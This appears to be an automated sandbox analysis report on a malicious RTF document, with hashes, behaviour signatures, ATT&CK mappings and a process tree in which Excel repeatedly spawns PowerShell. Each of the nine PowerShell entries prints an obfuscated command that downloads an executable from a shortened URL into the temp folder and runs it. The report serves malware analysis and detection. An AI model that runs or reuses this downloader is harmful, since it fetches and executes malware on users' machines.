ecdf26dffbf572bde7ae3b7fbc4f92e958dcf41f047a8af086e131173c49090d

Analysis

max time kernel
147s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
16-11-2024 12:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2020-01-13_104457.rtf
Size

1.6MB
MD5

c72b6a05064912fded813ede3595c6a5
SHA1

95a0fbdffa5f2084831716f1a488f8c3f1c7888a
SHA256

2644a076e344cf636e095c35ddec6cae24836bf76793fd311814075d74ec4f62
SHA512

0d36c16e21726c4143267872a660886cbecf0bc93b3abe80b4174a7a8a40fb28dcd023ae0d4cf006656ba76dc4a90cf4f8113707d9a0dc5895a77bbf54130cc4
SSDEEP

12288:ZHqKeOQqKeOQqKeOQqKeOQqKeOQqKeOQqKeOQqKeOQqKeOD:Zz

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://bit.ly/2NmQqH7%20

Signatures

Process spawned unexpected child process 9 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1860	224	powershell.exe	89
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2960	4768	powershell.exe	94
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2040	4696	powershell.exe	98
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2936	2576	powershell.exe	101
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1832	60	powershell.exe	106
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	3680	392	powershell.exe	109
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4568	3572	powershell.exe	112
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1528	2580	powershell.exe	115
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4472	4968	powershell.exe	118

Blocklisted process makes network request 9 IoCs

flow	pid	Process
30	1860	powershell.exe
37	2960	powershell.exe
43	2040	powershell.exe
48	2936	powershell.exe
56	1832	powershell.exe
57	3680	powershell.exe
62	4568	powershell.exe
63	1528	powershell.exe
65	4472	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1528	powershell.exe
1860	powershell.exe
2040	powershell.exe
2936	powershell.exe
3680	powershell.exe
2960	powershell.exe
1832	powershell.exe
4568	powershell.exe
4472	powershell.exe

Checks processor information in registry 2 TTPs 33 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE

Enumerates system info in registry 2 TTPs 33 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
4168	WINWORD.EXE
4168	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 27 IoCs

pid	Process
1860	powershell.exe
1860	powershell.exe
1860	powershell.exe
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe
2040	powershell.exe
2040	powershell.exe
2040	powershell.exe
2936	powershell.exe
2936	powershell.exe
2936	powershell.exe
1832	powershell.exe
1832	powershell.exe
1832	powershell.exe
3680	powershell.exe
3680	powershell.exe
3680	powershell.exe
4568	powershell.exe
4568	powershell.exe
4568	powershell.exe
1528	powershell.exe
1528	powershell.exe
1528	powershell.exe
4472	powershell.exe
4472	powershell.exe
4472	powershell.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: SeDebugPrivilege	1860	powershell.exe
Token: SeDebugPrivilege	2960	powershell.exe
Token: SeDebugPrivilege	2040	powershell.exe
Token: SeDebugPrivilege	2936	powershell.exe
Token: SeDebugPrivilege	1832	powershell.exe
Token: SeDebugPrivilege	3680	powershell.exe
Token: SeDebugPrivilege	4568	powershell.exe
Token: SeDebugPrivilege	1528	powershell.exe
Token: SeDebugPrivilege	4472	powershell.exe

Suspicious use of SetWindowsHookEx 44 IoCs

pid	Process
4168	WINWORD.EXE
4168	WINWORD.EXE
4168	WINWORD.EXE
224	EXCEL.EXE
224	EXCEL.EXE
224	EXCEL.EXE
224	EXCEL.EXE
4768	EXCEL.EXE
4768	EXCEL.EXE
4768	EXCEL.EXE
4768	EXCEL.EXE
4696	EXCEL.EXE
4696	EXCEL.EXE
4696	EXCEL.EXE
4696	EXCEL.EXE
2576	EXCEL.EXE
2576	EXCEL.EXE
2576	EXCEL.EXE
2576	EXCEL.EXE
60	EXCEL.EXE
60	EXCEL.EXE
60	EXCEL.EXE
60	EXCEL.EXE
392	EXCEL.EXE
392	EXCEL.EXE
392	EXCEL.EXE
392	EXCEL.EXE
3572	EXCEL.EXE
3572	EXCEL.EXE
3572	EXCEL.EXE
3572	EXCEL.EXE
2580	EXCEL.EXE
2580	EXCEL.EXE
2580	EXCEL.EXE
2580	EXCEL.EXE
4968	EXCEL.EXE
4968	EXCEL.EXE
4968	EXCEL.EXE
4968	EXCEL.EXE
3604	excelcnv.exe
4168	WINWORD.EXE
4168	WINWORD.EXE
4168	WINWORD.EXE
4168	WINWORD.EXE

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 224 wrote to memory of 1860	224	EXCEL.EXE	91
PID 224 wrote to memory of 1860	224	EXCEL.EXE	91
PID 4768 wrote to memory of 2960	4768	EXCEL.EXE	96
PID 4768 wrote to memory of 2960	4768	EXCEL.EXE	96
PID 4696 wrote to memory of 2040	4696	EXCEL.EXE	99
PID 4696 wrote to memory of 2040	4696	EXCEL.EXE	99
PID 2576 wrote to memory of 2936	2576	EXCEL.EXE	104
PID 2576 wrote to memory of 2936	2576	EXCEL.EXE	104
PID 60 wrote to memory of 1832	60	EXCEL.EXE	107
PID 60 wrote to memory of 1832	60	EXCEL.EXE	107
PID 392 wrote to memory of 3680	392	EXCEL.EXE	110
PID 392 wrote to memory of 3680	392	EXCEL.EXE	110
PID 3572 wrote to memory of 4568	3572	EXCEL.EXE	113
PID 3572 wrote to memory of 4568	3572	EXCEL.EXE	113
PID 2580 wrote to memory of 1528	2580	EXCEL.EXE	116
PID 2580 wrote to memory of 1528	2580	EXCEL.EXE	116
PID 4968 wrote to memory of 4472	4968	EXCEL.EXE	119
PID 4968 wrote to memory of 4472	4968	EXCEL.EXE	119

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2020-01-13_104457.rtf" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4168

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:224
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE( ”http://bit.ly/2NmQqH7 ” , ”$ENv:teMp\1249.exe” ) ; stARt ”$ENv:tEMP\1249.exe”
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1860

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4768
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE( ”http://bit.ly/2NmQqH7 ” , ”$ENv:teMp\1249.exe” ) ; stARt ”$ENv:tEMP\1249.exe”
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2960

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4696
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE( ”http://bit.ly/2NmQqH7 ” , ”$ENv:teMp\1249.exe” ) ; stARt ”$ENv:tEMP\1249.exe”
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2040

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2576
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE( ”http://bit.ly/2NmQqH7 ” , ”$ENv:teMp\1249.exe” ) ; stARt ”$ENv:tEMP\1249.exe”
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2936

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:60
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE( ”http://bit.ly/2NmQqH7 ” , ”$ENv:teMp\1249.exe” ) ; stARt ”$ENv:tEMP\1249.exe”
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1832

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:392
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE( ”http://bit.ly/2NmQqH7 ” , ”$ENv:teMp\1249.exe” ) ; stARt ”$ENv:tEMP\1249.exe”
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3680

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3572
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE( ”http://bit.ly/2NmQqH7 ” , ”$ENv:teMp\1249.exe” ) ; stARt ”$ENv:tEMP\1249.exe”
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4568

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2580
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE( ”http://bit.ly/2NmQqH7 ” , ”$ENv:teMp\1249.exe” ) ; stARt ”$ENv:tEMP\1249.exe”
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1528

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4968
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE( ”http://bit.ly/2NmQqH7 ” , ”$ENv:teMp\1249.exe” ) ; stARt ”$ENv:tEMP\1249.exe”
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4472

C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe
"C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:3604

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A

Filesize
471B

MD5
155cf71f7aaa5ff7b516476802c6365f

SHA1
ad1485190432e04d51d0f8b0aaffeaa90b791afb

SHA256
50d52e5ff1c94b56f723d3ef4e143e7830322e3dd901a9954f1824562cb1c584

SHA512
0b51e1d7e4ac0e1201e519247940627d26daf0c68a8a2e9cba82ff333d16fdf67d01553355bde1f1e07b4d38d589a4f348720e7975ae857da75fb88b26cae152

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9

Filesize
471B

MD5
1caefa8afdac530c1b9706e682f39a8b

SHA1
3759af20451460cb19ba2f78e6bbee5659f531b7

SHA256
4daf37b5a6a4686c9c6d4d44ac33e6a206c903e50d343bee26050ca2fded6586

SHA512
93549b4a0f5f28284ff06abb991e0935ede53da48356131a539a39e634b9104293afce9b5a6bb8b41da3331ad4e076767e727e9d9a4939d2d3d338666d34f39f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A

Filesize
412B

MD5
7625531802e8ecc48ebe81b577c53f4e

SHA1
47929b559597e30d208f4eba00eedb8d1987c6ec

SHA256
e897e556c0f1a3e1e75cc6d36204879e8de3107379e74a34f7f169a3b3a6308e

SHA512
c3a3890f51da2079d643c86c8442e986b7c47a720544babc2d9ab536961a64eb761b97bc80e23247c9059dacc46b5a597e23210baf875b91bc16f61b0f133ac2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9

Filesize
420B

MD5
751fdf30e142a6afc27dce1d2d909737

SHA1
0d3e6e45c86fe71412fdefa628951e0b4fc8524c

SHA256
604cf3ac90c32a01c6f5400e537f9f8987054b24cc6434f424e71c76b16e64bf

SHA512
b631b431a62016b93cc6dbdd184236129fef20ef5c154aafd85eaa2b27ae64e7393bdf289b44f503deda2c1775274a18dee8400db13bd1393bf985eaf0f853a0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\6D4D76BE-2C39-48E6-AF0F-079D1C1B5400

Filesize
174KB

MD5
1a280ddd449120c4c62a65c37b4537e8

SHA1
9aa89d9effc9aa8bfc32ebf379eb5f1266034242

SHA256
b46d3e1e48361d03bc733926e4ca38152f9302b3a65575070966945151964050

SHA512
6941ee3ca10f867f90f875dc36d189f5850b59d3f8c6c3f3134ae76d2427b446df618efc92d690e7fb9e2ec8b1d19b36931ab91885ede5312aaae4a819efeed2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml

Filesize
322KB

MD5
54d4dea7e2c4f8d938e102f92f8b54bf

SHA1
eba36fcc8af405ef5acc9bab5c3dccfd32feed8f

SHA256
9fddf4af60e6e787452936f2ec778c7e0f1d4dcfed991c0543f9b8b8fbae7f69

SHA512
c4d6955962782ef602c173fe3b85eb5ad0dcfcf3768cdab6d44549ab7b8fc606bd49dbca8089139a3d63fc551e1a150b5df86e9dedbf2cff0a20c3e12e6a8282

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
085ebd119f5fc6b8f63720fac1166ff5

SHA1
af066018aadec31b8e70a124a158736aca897306

SHA256
b8411fe8ec499074fca9047f6983d920279e84ddf3b02b2dd5c08cf07ec44687

SHA512
adb0522830db26123347cb485c43b156f5c888510e52091ba0fafc22b650ad29630c027746c920321905c28259dce7ff63dded93a79efddd5567c68312117875

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
33eea2792b9fa42f418d9d609f692007

SHA1
48c3916a14ef2d9609ec4d2887a337b973cf8753

SHA256
8f7807c324626abc2d3504638958c148e2e3f3e212261f078940cf4c5f0c4fbb

SHA512
b2dbfcdf2599c38c966c5ebce714a5cd50e2f8b411555acf9f02b31b9c29b8ab53a9afa9d32bab87a06e08f8b2c7818d600773f659a058c8af81c50be7f09b95

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
81f7ddbfffbcb29fe5a543b3a1e438b8

SHA1
d16b194470fe1404be5d9037fe9bccce3677e58f

SHA256
df476fccec8b974e8f602f490220c3674c6c4babf5d8050db2f75e80ce09d076

SHA512
9a3b6dab440240cc4ce8c5ab7669cc4d14bdb3013da26760411f099c2a59f6daa42a860eec6c6033378a49355e54a50177b68825d8c912286be49976b22fa101

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
b00f3f56c104c94e03cd2ad8452c14e7

SHA1
51b78e45015e0d9d62fbdf31b75a22535a107204

SHA256
ba2b669020334ff01a85bfc900ea4371ea557bd315f154875d9bdfdc16ae8b50

SHA512
93e1609be5bbb414c285f37432ce93294c3d1583ef46c7c6c570c122f0b166c34b0ad87de708005c8af97dee27923ba53395a34c2563cdadf3c0a708848b3525

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
bb5122013e9da21ebcd7cf8bbfd442d8

SHA1
137dc37b75c41a0edca25bc20dab16729c23d5f5

SHA256
fa311153c8e26e115ed889e986eabf2c6f96123d7a3a7f89102bfa89321342c3

SHA512
6582f6d15a31dcaecc6e6fee0ebb21b6d2278c4b2c1f80580172181d457c47a8be7edb0bc007c701c8a3adc391656ee166a77f49f575539f4f7e5188f5da8a0a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
fd39de0268d6a6ad214a2bb8e7d04444

SHA1
8519ccaaf31ba572e6224e052bd555268e7c205d

SHA256
37a1920e52980869d54d3d8affc1a370e9cd947813e51cc4fec909c4ad61a827

SHA512
6afbdfa73e5a3e3c4e593ceef2e1f3940d2ec7a40900c5abbc8bf686889ff5b4d5193bef682e8932a750a79b735569779298868f586a6e271eba8670c7002f42

Download Submit
